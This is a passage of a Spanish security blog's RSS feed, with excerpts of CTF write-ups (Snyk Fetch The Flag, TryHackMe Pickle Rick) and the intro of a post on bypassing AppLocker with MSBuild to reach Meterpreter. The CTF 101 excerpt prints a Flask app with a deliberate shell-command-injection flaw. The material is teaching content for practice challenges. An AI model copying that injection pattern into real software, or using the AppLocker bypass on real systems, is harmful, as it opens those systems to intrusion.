&lt;p&gt;Reúne una organización inteligente de contactos, widgets de marcado rápido personalizables y un modo &amp;ldquo;Business Focus&amp;rdquo; que filtra las interrupciones para que mantengas el control de cada conversación. Entre bastidores, AndroDialer ofrece analíticas de llamadas en profundidad para ayudarte a detectar tendencias de comunicación, además de funciones de seguridad mejoradas. Su interfaz altamente adaptable se completa con temas claro y oscuro, límites de tiempo de llamada y ajustes totalmente personalizados que logran el equilibrio ideal entre eficiencia y elegancia, tanto para llamadas personales como profesionales.&lt;/p&gt;</description></item><item><title>AppLocker: Bypass de Reglas por Defecto con MSBuild</title><link>https://hackpuntes.com/es/posts/applocker-install-and-bypass-with-msbuild/</link><pubDate>Sat, 06 Dec 2025 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/applocker-install-and-bypass-with-msbuild/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/applocker_install_and_bypass_with_msbuild/applocker_install_and_bypass_with_msbuild_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/applocker_install_and_bypass_with_msbuild/applocker_install_and_bypass_with_msbuild_banner.webp" alt="AppLocker: Bypass de Reglas por Defecto con MSBuild" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;AppLocker se ha convertido en una de las primeras líneas de defensa para restringir qué software puede ejecutarse en un entorno corporativo. Sin embargo, una implementación apresurada que confíe ciegamente en las &lt;strong&gt;Reglas Predeterminadas (Default Rules)&lt;/strong&gt; puede dar una falsa sensación de seguridad.&lt;/p&gt;
&lt;p&gt;Si un administrador configura AppLocker permitiendo todo lo firmado por Microsoft o todo lo que resida en &lt;code&gt;C:\Windows\*&lt;/code&gt;, un usuario malintencionado podría aprovechar binarios nativos del sistema (LOLBins) para ejecutar código arbitrario. Hoy vamos a diseccionar cómo &lt;code&gt;MSBuild.exe&lt;/code&gt; puede convertirse en nuestra puerta de entrada para una sesión de Meterpreter, evadiendo estas restricciones básicas.&lt;/p&gt;</description></item><item><title>Descubriendo Tradecraft Garden</title><link>https://hackpuntes.com/es/posts/exploring-tradecraft-garden/</link><pubDate>Tue, 02 Dec 2025 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/exploring-tradecraft-garden/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/exploring_tradecraft_garden/exploring_tradecraft_garden_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/exploring_tradecraft_garden/exploring_tradecraft_garden_banner.webp" alt="Descubriendo Tradecraft Garden" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Aprovechando las ofertas del reciente &lt;strong&gt;Black Friday&lt;/strong&gt;, decidí adquirir el curso &lt;a href="https://www.zeropointsecurity.co.uk/course/red-team-ops-ii" target="_blank" rel="noopener noreferrer"&gt;CRTL (Certified Red Team Lead)&lt;/a&gt;
de ZeroPointSecurity. Si bien el material del curso es denso y técnico (como era de esperar de &lt;a href="https://x.com/_RastaMouse" target="_blank" rel="noopener noreferrer"&gt;Rasta Mouse&lt;/a&gt;
), una de las primeras joyas con las que me he topado no está oculta detrás de un paywall, sino que es un proyecto público que merece mucha más atención: &lt;a href="https://tradecraftgarden.org/" target="_blank" rel="noopener noreferrer"&gt;Tradecraft Garden&lt;/a&gt;
.&lt;/p&gt;</description></item><item><title>TryHackMe - Machine - Pickle Rick v2</title><link>https://hackpuntes.com/es/posts/tryhackme/machines/pickle-rick-writeup/</link><pubDate>Mon, 17 Nov 2025 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/tryhackme/machines/pickle-rick-writeup/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/thm-machine-pickle-rick-v2/thm-machine-pickle-rick-v2_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/thm-machine-pickle-rick-v2/thm-machine-pickle-rick-v2_banner.webp" alt="TryHackMe - Machine - Pickle Rick v2" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;¡Buenas, hackers! 👋&lt;/p&gt;
&lt;p&gt;Hoy, nos sumergimos en la &lt;a href="https://tryhackme.com/room/picklerick" target="_blank" rel="noopener noreferrer"&gt;máquina Pickle Rick&lt;/a&gt;
de TryHackMe. Es un desafío clásico de nivel &lt;strong&gt;🟩 Fácil&lt;/strong&gt;, perfecto para practicar la enumeración web y la escalada de privilegios básica.&lt;/p&gt;
&lt;h2 id="-antes-de-empezar"&gt;🚀 Antes de empezar&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Añadimos&lt;/strong&gt; la máquina al archivo &lt;code&gt;/etc/hosts&lt;/code&gt;, &lt;strong&gt;comprobamos la conexión&lt;/strong&gt; con &lt;code&gt;ping&lt;/code&gt; y &lt;strong&gt;creamos las carpetas de trabajo&lt;/strong&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;10.10.34.26\tpicklerick.thm&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; sudo tee -a /etc/hosts
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;ping -c &lt;span class="m"&gt;1&lt;/span&gt; picklerick.thm
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;mkdir -p ~/thm/picklerick/&lt;span class="o"&gt;{&lt;/span&gt;exploits,fuzz,http,nmap&lt;span class="o"&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;cd&lt;/span&gt; ~/thm/picklerick/
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="-reconocimiento"&gt;🔎 Reconocimiento&lt;/h2&gt;
&lt;h3 id="escaneo-de-puertos-con-nmap"&gt;Escaneo de puertos con Nmap&lt;/h3&gt;
&lt;p&gt;Comprobamos &lt;strong&gt;todos los puertos&lt;/strong&gt; que están &lt;strong&gt;abiertos&lt;/strong&gt;, detectamos el servicio y su versión con &lt;code&gt;nmap&lt;/code&gt; y generamos &lt;code&gt;all.html&lt;/code&gt; para ver la información.&lt;/p&gt;</description></item><item><title>Snyk Fetch The Flag - TimeOff</title><link>https://hackpuntes.com/es/posts/snyk-fetch-the-flag-timeoff/</link><pubDate>Sun, 09 Mar 2025 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/snyk-fetch-the-flag-timeoff/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/snyk_fetch_the_flag_timeoff/snyk_fetch_the_flag_timeoff_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/snyk_fetch_the_flag_timeoff/snyk_fetch_the_flag_timeoff_banner.webp" alt="Snyk Fetch The Flag - TimeOff" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;En este desafío de CTF, se nos asigna la tarea de realizar un &lt;strong&gt;pentest&lt;/strong&gt; en una aplicación web basada en el patrón &lt;strong&gt;Modelo-Vista-Controlador (MVC)&lt;/strong&gt; y desarrollada en &lt;code&gt;Ruby on Rails&lt;/code&gt;. La aplicación permite a los empleados de una empresa &lt;strong&gt;solicitar tiempo de descanso&lt;/strong&gt;, y se nos proporciona el código fuente junto con dos credenciales (&lt;code&gt;admin&lt;/code&gt; y &lt;code&gt;user&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;Al analizar la aplicación, notamos que el formulario para solicitar tiempo de descanso &lt;strong&gt;permite la subida de archivos&lt;/strong&gt;, lo cual es un punto de interés a revisar en cualquier auditoría web.&lt;/p&gt;</description></item><item><title>Snyk Fetch The Flag - Coding Mountains</title><link>https://hackpuntes.com/es/posts/snyk-fetch-the-flag-coding-mountains/</link><pubDate>Sat, 08 Mar 2025 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/snyk-fetch-the-flag-coding-mountains/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/snyk_fetch_the_flag_coding_mountains/snyk_fetch_the_flag_coding_mountains_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/snyk_fetch_the_flag_coding_mountains/snyk_fetch_the_flag_coding_mountains_banner.webp" alt="Snyk Fetch The Flag - Coding Mountains" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Los &lt;strong&gt;retos de scripting&lt;/strong&gt; son mis favoritos en los CTF, y este, sin duda, ha sido mi preferido en Snyk Fetch The Flag 2025. El desafío consiste en &lt;strong&gt;responder 50 preguntas rápidas sobre las montañas más famosas del mundo&lt;/strong&gt;. Debemos responder con su altura (en pies) y el año en el que fueron escaladas por primera vez, utilizando el siguiente formato: &lt;code&gt;height,year&lt;/code&gt;.&lt;/p&gt;</description></item><item><title>Snyk Fetch The Flag - ClickityClack</title><link>https://hackpuntes.com/es/posts/snyk-fetch-the-flag-clickityclack/</link><pubDate>Fri, 07 Mar 2025 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/snyk-fetch-the-flag-clickityclack/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/snyk_fetch_the_flag_clickityclack/snyk_fetch_the_flag_clickityclack_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/snyk_fetch_the_flag_clickityclack/snyk_fetch_the_flag_clickityclack_banner.webp" alt="Snyk Fetch The Flag - ClickityClack" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;En este reto, partimos de un fichero &lt;code&gt;pcapng&lt;/code&gt; que contiene la flag oculta en su interior. Inicialmente, intenté analizarlo con &lt;strong&gt;Wireshark&lt;/strong&gt;, pero no encontraba nada relevante. Fue entonces cuando una simple búsqueda en Google me dio la pista clave:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-txt" data-lang="txt"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;pcapng usb ctf
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;a href="https://hackpuntes.com/images/snyk_fetch_the_flag_clickityclack/snyk_fetch_the_flag_clickityclack_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/snyk_fetch_the_flag_clickityclack/snyk_fetch_the_flag_clickityclack_001.webp" alt="Snyk Fetch The Flag - ClickityClack" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Esta búsqueda me llevó a descubrir una herramienta llamada &lt;a href="https://raw.githubusercontent.com/5h4rrk/CTF-Usb_Keyboard_Parser/refs/heads/main/Usb_Keyboard_Parser.py" target="_blank" rel="noopener noreferrer"&gt;Usb_Keyboard_Parser.py&lt;/a&gt;
que parsea los paquetes de tráfico USB, como las pulsaciones de teclas.&lt;/p&gt;</description></item><item><title>Snyk Fetch The Flag - Science 100</title><link>https://hackpuntes.com/es/posts/snyk-fetch-the-flag-science-100/</link><pubDate>Thu, 06 Mar 2025 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/snyk-fetch-the-flag-science-100/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/snyk_fetch_the_flag_science_100/snyk_fetch_the_flag_science_100_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/snyk_fetch_the_flag_science_100/snyk_fetch_the_flag_science_100_banner.webp" alt="Snyk Fetch The Flag - Science 100" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;En este desafío de CTF, nos encontramos con un &lt;strong&gt;terminal de Robco Industries&lt;/strong&gt; similar al que aparece en la saga del videojuego &lt;strong&gt;Fallout&lt;/strong&gt;. Nuestra misión es descifrar la contraseña correcta utilizando la mecánica de &lt;code&gt;Likeness (similitud)&lt;/code&gt;, que nos indica cuántas letras coinciden en la posición exacta con la palabra clave.&lt;/p&gt;
&lt;h2 id="-conectando-al-reto"&gt;🖥️ Conectando al reto&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;$ nc challenge.ctf.games &lt;span class="m"&gt;32377&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Al conectarnos, el sistema nos da la bienvenida y nos presenta una lista de &lt;strong&gt;posibles contraseñas&lt;/strong&gt; camufladas entre símbolos aleatorios.&lt;/p&gt;</description></item><item><title>Snyk Fetch The Flag - CTF 101</title><link>https://hackpuntes.com/es/posts/snyk-fetch-the-flag-ctf-101/</link><pubDate>Wed, 05 Mar 2025 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/snyk-fetch-the-flag-ctf-101/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/snyk_fetch_the_flag_ctf_101/snyk_fetch_the_flag_ctf_101_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/snyk_fetch_the_flag_ctf_101/snyk_fetch_the_flag_ctf_101_banner.webp" alt="Snyk Fetch The Flag - CTF 101" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Este reto está diseñado como una &lt;strong&gt;introducción a los CTFs&lt;/strong&gt; (Capture The Flag). Es un desafío sencillo que permite familiarizarse con la explotación de vulnerabilidades en aplicaciones web.&lt;/p&gt;
&lt;p&gt;Al analizar el código fuente proporcionado, observamos que se trata de una aplicación web desarrollada con &lt;strong&gt;Flask (Python)&lt;/strong&gt;, cuyo código es el siguiente:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="nn"&gt;flask&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;Flask&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;render_template&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;request&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;redirect&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;flash&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;subprocess&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;app&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;Flask&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="vm"&gt;__name__&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;app&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;secret_key&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;supersecretkey&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nd"&gt;@app.route&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;/&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;methods&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;GET&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;POST&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;index&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;request&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;method&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;POST&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;name&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;request&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;form&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;name&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;strip&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;flash&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;Error: Name cannot be empty.&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;error&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;redirect&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;/&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="c1"&gt;# I sure hope no one tries to run any commands by injecting here...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;output&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;subprocess&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;check_output&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;echo &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;shell&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="kc"&gt;True&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;text&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="kc"&gt;True&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;subprocess&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;STDOUT&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;flash&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;Hello, &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;output&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;strip&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;! Good luck!&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;success&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="c1"&gt;# ...alright, the challenges won&amp;#39;t be this obvious on game day, but I hope it gives you a good idea of how the game is played!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="k"&gt;except&lt;/span&gt; &lt;span class="n"&gt;subprocess&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;CalledProcessError&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;flash&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;Error: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;output&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;strip&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;error&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;redirect&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;/&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;render_template&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;index.html&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="vm"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;__main__&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;app&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;run&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;host&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;0.0.0.0&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;port&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;5000&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="-dónde-está-la-vulnerabilidad"&gt;🔍 ¿Dónde está la vulnerabilidad?&lt;/h2&gt;
&lt;p&gt;El problema principal radica en el siguiente fragmento de código:&lt;/p&gt;</description></item><item><title>Snyk Fetch The Flag - Screaming Crying Throwing up</title><link>https://hackpuntes.com/es/posts/snyk-fetch-the-flag-screaming-crying-throwing-up/</link><pubDate>Tue, 04 Mar 2025 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/snyk-fetch-the-flag-screaming-crying-throwing-up/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/snyk_fetch_the_flag_screaming_crying_throwing_up/snyk_fetch_the_flag_screaming_crying_throwing_up_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/snyk_fetch_the_flag_screaming_crying_throwing_up/snyk_fetch_the_flag_screaming_crying_throwing_up_banner.webp" alt="Snyk Fetch The Flag - Screaming Crying Throwing up" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Este reto consiste en descifrar un binario cifrado con &lt;a href="https://en.wikipedia.org/wiki/Scream_%28cipher%29" target="_blank" rel="noopener noreferrer"&gt;scream&lt;/a&gt;
. Para ello, podemos utilizar la herramienta &lt;a href="https://scream-cipher.netlify.app/" target="_blank" rel="noopener noreferrer"&gt;Scream Cipher Translator&lt;/a&gt;
.&lt;/p&gt;
&lt;p&gt;Si abrimos el archivo &lt;code&gt;screaming.bin&lt;/code&gt; en &lt;strong&gt;VSCode&lt;/strong&gt;, veremos el siguiente contenido:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-txt" data-lang="txt"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;a̮ăaa̋{áa̲aȧa̮ȧaa̮áa̲a̧ȧȧa̮ȧaa̲a̧aa̮ȧa̲aáa̮a̲aa̲a̮aaa̧}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Sin embargo, si usamos &lt;code&gt;cat&lt;/code&gt; en la terminal (CMD, PowerShell o Bash), obtenemos un resultado diferente:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-txt" data-lang="txt"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;$ cat screaming.bin
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;aăaa{áaaȧaȧaaáaaȧȧaȧaaaaaȧaaáaaaaaaaa}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;⚠️ ¡Atención! ⚠️&lt;/p&gt;
&lt;p&gt;El contenido del archivo puede verse distinto dependiendo del visor utilizado. Esto es clave al momento de analizar el cifrado y evitar confusiones. 🧐&lt;/p&gt;</description></item><item><title>Snyk Fetch The Flag - Unfurl</title><link>https://hackpuntes.com/es/posts/snyk-fetch-the-flag-unfurl/</link><pubDate>Mon, 03 Mar 2025 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/snyk-fetch-the-flag-unfurl/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/snyk_fetch_the_flag_unfurl/snyk_fetch_the_flag_unfurl_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/snyk_fetch_the_flag_unfurl/snyk_fetch_the_flag_unfurl_banner.webp" alt="Snyk Fetch The Flag - Unfurl" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;En este reto nos enfrentamos a una aplicación web que &lt;strong&gt;obtiene los metadatos&lt;/strong&gt; de cualquier URL ingresada en el formulario.&lt;/p&gt;
